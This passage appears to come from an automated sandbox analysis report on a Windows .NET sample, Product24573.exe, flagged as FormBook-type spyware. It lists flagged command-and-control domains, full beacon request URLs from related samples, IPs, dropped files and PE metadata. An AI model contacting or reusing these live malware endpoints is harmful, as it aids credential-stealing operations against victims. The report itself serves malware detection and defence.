                              		unknown
                              http://www.fontbureau.come.com9Product24573.exe, 00000000.00000003.394424226.0000000005BA3000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fonts.comProduct24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.sandoll.co.krProduct24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.sakkal.comProduct24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.jiyu-kobo.co.jp/Y0aProduct24573.exe, 00000000.00000003.385985075.0000000005BA7000.00000004.00000020.00020000.00000000.sdmp, Product24573.exe, 00000000.00000003.385896469.0000000005BA7000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.founder.com.cn/cnhProduct24573.exe, 00000000.00000003.385178049.0000000005BAC000.00000004.00000020.00020000.00000000.sdmp, Product24573.exe, 00000000.00000003.385033767.0000000005BAC000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.wearecatalyst.appexplorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.vns96.net/bpg5/explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.apache.org/licenses/LICENSE-2.0Product24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.fontbureau.comProduct24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmp, Product24573.exe, 00000000.00000002.404623654.0000000005BA8000.00000004.00000020.00020000.00000000.sdmp, Product24573.exe, 00000000.00000003.398796962.0000000005BA0000.00000004.00000020.00020000.00000000.sdmp, Product24573.exe, 00000000.00000003.394424226.0000000005BA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.techwithsun.com/bpg5/www.techwithsun.com9explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.musicandgros.comexplorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.660140622.00000000085C8000.00000040.80000000.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.agfamonotype.Product24573.exe, 00000000.00000003.394424226.0000000005BA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icowlanext.exe, 00000006.00000002.649740499.0000000000606000.00000004.00000020.00020000.00000000.sdmp, -15B7L5MNM.6.drfalse
                                      		high
                                      http://www.jhg61.com/bpg5/www.jhg61.comti-8=LyKdFPBKAe5Wexplorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.fabricadepack.fun/bpg5/explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchwlanext.exe, 00000006.00000002.649740499.0000000000606000.00000004.00000020.00020000.00000000.sdmp, -15B7L5MNM.6.drfalse
                                        		high
                                        http://www.perkibeans.com)Bexplorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		low
                                        http://www.wearecatalyst.app/bpg5/www.wearecatalyst.appti-8=LyKdFPBKAe5Wexplorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.jiyu-kobo.co.jp/jp/Product24573.exe, 00000000.00000003.385985075.0000000005BA7000.00000004.00000020.00020000.00000000.sdmp, Product24573.exe, 00000000.00000003.385896469.0000000005BA7000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://en.wikipProduct24573.exe, 00000000.00000003.384791349.0000000005BAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.42230.orgexplorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        130.185.109.77
                                        		www.berlinhealthweek.comGermany
                                        		51191XIRRADEtrue
                                        81.169.145.93
                                        		musicandgros.comGermany
                                        		6724STRATOSTRATOAGDEtrue
                                        198.177.124.57
                                        		www.gomarketing.infoUnited States
                                        		395681FINALFRONTIERVGtrue

                                        General Information

                                        Joe Sandbox Version:37.1.0 Beryl
                                        Analysis ID:878554
                                        Start date and time:2023-05-30 19:32:20 +02:00
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 10m 21s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:8
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:1
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample file name:Product24573.exe
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@9/2@6/3
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HDC Information:
                                        • Successful, ratio: 72.8% (good quality ratio 66.4%)
                                        • Quality average: 71.5%
                                        • Quality standard deviation: 32.1%
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 142
                                        • Number of non-executed functions: 167
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe

                                        Warnings

                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe
                                        • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        19:33:31API Interceptor1x Sleep call for process: Product24573.exe modified
                                        19:33:40API Interceptor736x Sleep call for process: explorer.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        130.185.109.77Siirtokuitti_006703.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • www.printmyride.store/tchg/?O0qEM=QQ6dpIpAk027UR3BL5U7sG0DxH6sKQa5YnzY0agrXpda3w5URJfAhsqjtJqbY2/M8fhrkTh6mIV7dbZQ8z6SYrdm6JILdk9Mfg==&CF1Ki=UnDuQcdCFs1MNsvY
                                        P5348574_74676.exeGet hashmaliciousFormBookBrowse
                                        • www.berlinhealthweek.com/bpg5/?lpw7=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgF7dehg5lWobVA==&UZCu=zJfEuRXw-P
                                        535276_86376.exeGet hashmaliciousFormBookBrowse
                                        • www.berlinhealthweek.com/bpg5/?yDcF=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2k5SHNZX0bjzo+VQ==&jdd=UX4BZm
                                        Product_List.exeGet hashmaliciousFormBookBrowse
                                        • www.berlinhealthweek.com/bpg5/?JBfKk=_uLb4J-vJhW8&8mBWmPn=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgF7dehg5lWobVA==
                                        PS_231.exeGet hashmaliciousFormBookBrowse
                                        • www.berlinhealthweek.com/bpg5/?kyx=IT_WJ&HqE8Cy=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgAvEQCI5kWwTVA==
                                        KD_MEDICAL_POLSKA_23053371.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • www.die-cyber-versicherer.com/co9t/?LVuSGU=-giyq0&MGuik=O0wiA489QXAo4/zisxW0kKpRL90vV9sT3USeBzF+d48ZKZIeaBWCTOAUxMvYVu20Q54TxHeRRe+2rSLSyytqRGlmgBV+voPflw==
                                        s4YvlK74zJ.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • www.die-cyber-versicherer.com/co9t/?h1=O0wiA489QXAo4/zisxW0kKpRL90vV9sT3USeBzF+d48ZKZIeaBWCTOAUxMvYVu20Q54TxHeRRe+2rSLSyytqRGlmgBV+voPflw==&m8hK_F=yFTUihtd4y
                                        24Hdkz2sGxG1Xq0.exeGet hashmaliciousFormBookBrowse
                                        • www.berlinhealthweek.com/bpg5/?Bjk=Fjw7NbIMlZ8ijMXD&67FoqNQb=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2k5SHNZX0bjzo+VQ==
                                        Project6531678ZXGT7E.exeGet hashmaliciousFormBookBrowse
                                        • www.berlinhealthweek.com/bpg5/?lN=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2k4SHQdXkalH8+fUZT81zR875Z&g6tdKQ=x7tw
                                        Product_2798679039798.exeGet hashmaliciousFormBookBrowse
                                        • www.berlinhealthweek.com/bpg5/?uv07ZY=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2k5SHNZX0bjzo+VQ==&oQpHyl=qT7yWNInu
                                        32426387455_W5373883.exeGet hashmaliciousFormBookBrowse
                                        • www.berlinhealthweek.com/bpg5/?GZN=6mGs&pf3=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2k4V3BQC4bliA6eEZT81nMxb5Z
                                        DHL_INVOICE_NOTIFICATION_pdf.exeGet hashmaliciousFormBookBrowse
                                        • www.berlinhealthweek.com/n65e/?L6G9CC=6yO9fYe2l72ucsH66gyZY6BVRsQbQ6t2bL7S9rbBk/tOcgXaRN4vcF5ewa8mY8al2Njms7MhjcL3QNfNzH9xbPTfBYDSAjd9Vw==&OjglYF=nrT9ttFevz9kJV
                                        INVOICE_#2736.exeGet hashmaliciousFormBookBrowse
                                        • www.berlinhealthweek.com/bpg5/?JaU=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2k4SHQdXkalH8+fUZT81zR875Z&G3=nb4FI3S6Ge8yTg
                                        PURCHASE_ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                        • www.berlinhealthweek.com/n65e/?vsc5CQEL=6yO9fYe2l72ucsH66gyZY6BVRsQbQ6t2bL7S9rbBk/tOcgXaRN4vcF5ewa8mY8al2Njms7MhjcL3QNfNzH9ycOP5O5TaCRJITfdEpyVN7IM+&BOlc_j=zr9WAC
                                        PUCHASE_INQUIRY_pdf.exeGet hashmaliciousFormBookBrowse
                                        • www.berlinhealthweek.com/n65e/?JBlCXoB=6yO9fYe2l72ucsH66gyZY6BVRsQbQ6t2bL7S9rbBk/tOcgXaRN4vcF5ewa8mY8al2Njms7MhjcL3QNfNzH9yRp3PEq7aGAhEUg==&ik_E=eSJ0Nu0lvfR1d
                                        rORDERINQUIRY_pdf.exeGet hashmaliciousFormBookBrowse
                                        • www.berlinhealthweek.com/n65e/?2zA4Ozc2=6yO9fYe2l72ucsH66gyZY6BVRsQbQ6t2bL7S9rbBk/tOcgXaRN4vcF5ewa8mY8al2Njms7MhjcL3QNfNzH9ycOP5O5TaCRJITfdEpyVN7IM+&vaaH=mXhCUEu
                                        SCAN_039478575-PDF.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • www.haschischfabrik.com/q9dv/?Jbh8aP=FBQmPzGUu2i12HY687gK1tL9tCd8zZBd53AIwE1qzSPr9ozt5Jdog2dHWNPdIOyDotYFuSyhriuPbrH5p8hvlRNA52TgK1SmYA==&m8sX4N=6lrLYL38Pp3TVn4p
                                        hornMX9rFW.exeGet hashmaliciousFormBookBrowse
                                        • www.heyabo.com/hisp/?YR=lRVzyHAqIBmA5ZYI/BSeAnUngkbG+4zlr4M5FXEoiiIvCzMiK86iL+tPeqjgOQFDC3P8&utUPMn=mT-DZ

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        www.berlinhealthweek.comP5348574_74676.exeGet hashmaliciousFormBookBrowse
                                        • 130.185.109.77
                                        Product7825.exeGet hashmaliciousFormBookBrowse
                                        • 130.185.109.77
                                        535276_86376.exeGet hashmaliciousFormBookBrowse
                                        • 130.185.109.77
                                        Product_List.exeGet hashmaliciousFormBookBrowse
                                        • 130.185.109.77
                                        PS_231.exeGet hashmaliciousFormBookBrowse
                                        • 130.185.109.77
                                        24Hdkz2sGxG1Xq0.exeGet hashmaliciousFormBookBrowse
                                        • 130.185.109.77
                                        Project6531678ZXGT7E.exeGet hashmaliciousFormBookBrowse
                                        • 130.185.109.77
                                        Product_2798679039798.exeGet hashmaliciousFormBookBrowse
                                        • 130.185.109.77
                                        32426387455_W5373883.exeGet hashmaliciousFormBookBrowse
                                        • 130.185.109.77
                                        DHL_INVOICE_NOTIFICATION_pdf.exeGet hashmaliciousFormBookBrowse
                                        • 130.185.109.77
                                        INVOICE_#2736.exeGet hashmaliciousFormBookBrowse
                                        • 130.185.109.77
                                        PURCHASE_ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                        • 130.185.109.77
                                        PUCHASE_INQUIRY_pdf.exeGet hashmaliciousFormBookBrowse
                                        • 130.185.109.77
                                        rORDERINQUIRY_pdf.exeGet hashmaliciousFormBookBrowse
                                        • 130.185.109.77
                                        www.gomarketing.infoP5348574_74676.exeGet hashmaliciousFormBookBrowse
                                        • 198.177.124.57
                                        Product7825.exeGet hashmaliciousFormBookBrowse
                                        • 198.177.124.57
                                        535276_86376.exeGet hashmaliciousFormBookBrowse
                                        • 198.177.124.57
                                        Product_List.exeGet hashmaliciousFormBookBrowse
                                        • 198.177.124.57
                                        PS_231.exeGet hashmaliciousFormBookBrowse
                                        • 198.177.124.57
                                        24Hdkz2sGxG1Xq0.exeGet hashmaliciousFormBookBrowse
                                        • 198.177.124.57
                                        Project6531678ZXGT7E.exeGet hashmaliciousFormBookBrowse
                                        • 198.177.124.57
                                        Product_2798679039798.exeGet hashmaliciousFormBookBrowse
                                        • 198.177.124.57
                                        32426387455_W5373883.exeGet hashmaliciousFormBookBrowse
                                        • 198.177.124.57
                                        INVOICE_#2736.exeGet hashmaliciousFormBookBrowse
                                        • 198.177.124.57

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        XIRRADESiirtokuitti_006703.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 130.185.109.77
                                        P5348574_74676.exeGet hashmaliciousFormBookBrowse
                                        • 130.185.109.77
                                        Product7825.exeGet hashmaliciousFormBookBrowse
                                        • 130.185.109.77
                                        535276_86376.exeGet hashmaliciousFormBookBrowse
                                        • 130.185.109.77
                                        Product_List.exeGet hashmaliciousFormBookBrowse
                                        • 130.185.109.77
                                        PS_231.exeGet hashmaliciousFormBookBrowse
                                        • 130.185.109.77
                                        KD_MEDICAL_POLSKA_23053371.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 130.185.109.77
                                        s4YvlK74zJ.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 130.185.109.77
                                        24Hdkz2sGxG1Xq0.exeGet hashmaliciousFormBookBrowse
                                        • 130.185.109.77
                                        Project6531678ZXGT7E.exeGet hashmaliciousFormBookBrowse
                                        • 130.185.109.77
                                        Product_2798679039798.exeGet hashmaliciousFormBookBrowse
                                        • 130.185.109.77
                                        32426387455_W5373883.exeGet hashmaliciousFormBookBrowse
                                        • 130.185.109.77
                                        DHL_INVOICE_NOTIFICATION_pdf.exeGet hashmaliciousFormBookBrowse
                                        • 130.185.109.77
                                        INVOICE_#2736.exeGet hashmaliciousFormBookBrowse
                                        • 130.185.109.77
                                        KXDmIlMnn3.elfGet hashmaliciousMiraiBrowse
                                        • 185.169.25.1
                                        PURCHASE_ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                        • 130.185.109.77
                                        PUCHASE_INQUIRY_pdf.exeGet hashmaliciousFormBookBrowse
                                        • 130.185.109.77
                                        rORDERINQUIRY_pdf.exeGet hashmaliciousFormBookBrowse
                                        • 130.185.109.77
                                        SCAN_039478575-PDF.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 130.185.109.77
                                        SqBed9dcfzGet hashmaliciousMiraiBrowse
                                        • 195.138.242.140

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Product24573.exe.log

                                        Download File
                                        Process:C:\Users\user\Desktop\Product24573.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1216
                                        Entropy (8bit):5.355304211458859
                                        Encrypted:false
                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                        MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                        SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                        SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                        SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                        Malicious:true
                                        Reputation:high, very likely benign file
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                        C:\Users\user\AppData\Local\Temp\-15B7L5MNM

                                        Download File
                                        Process:C:\Windows\SysWOW64\wlanext.exe
                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                        Category:dropped
                                        Size (bytes):94208
                                        Entropy (8bit):1.2882898331044472
                                        Encrypted:false
                                        SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                        MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                        SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                        SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                        SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):7.7667856129364585
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Windows Screen Saver (13104/52) 0.07%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        File name:Product24573.exe
                                        File size:748544
                                        MD5:0ba48f5e511aac79f954af60cec8a491
                                        SHA1:d50e0f9ce108295a8810beb7b798b443ccb6da82
                                        SHA256:b060f747e4aa941b42d475cf40290b6211911e1e949d8a2df0705660cd014996
                                        SHA512:7d63e69cfa08b9fbe19c1a4aefc0969384a18a488f62c477f5bcf4a55b63f9d6dacfc45ab1ea825e16825328e99af9724271f15c2f92c225669cd59c1605a74a
                                        SSDEEP:12288:39HkmFx2iqNhujGjUC1/VWKxrdYTZ9uiPVDhtMI8SdHJr5dGqs:NEmFxUD5Yl9uidDDMUHJWr
                                        TLSH:68F41214236A9B27D56F47FC60A1BE7403FE1A8A7A23E75B0DC370E96F1BB440911687
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...9.td..............0..P..........>o... ........@.. ....................................@................................

                                        File Icon

                                        Icon Hash:4f81caccccca450f

                                        Static PE Info

                                        General

                                        Entrypoint:0x4b6f3e
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x64740039 [Mon May 29 01:30:33 2023 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                        Entrypoint Preview

                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xb6eeb0x4f.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xb80000x1658.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000xc.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0xb353c0x54.text
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x20000xb4f440xb5000False0.889218156508978data7.7813901461622725IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rsrc0xb80000x16580x1800False0.2596028645833333data4.73927457912669IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0xba0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountry
                                        RT_ICON0xb81600x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m
                                        RT_GROUP_ICON0xb92080x14data
                                        RT_GROUP_ICON0xb921c0x14data
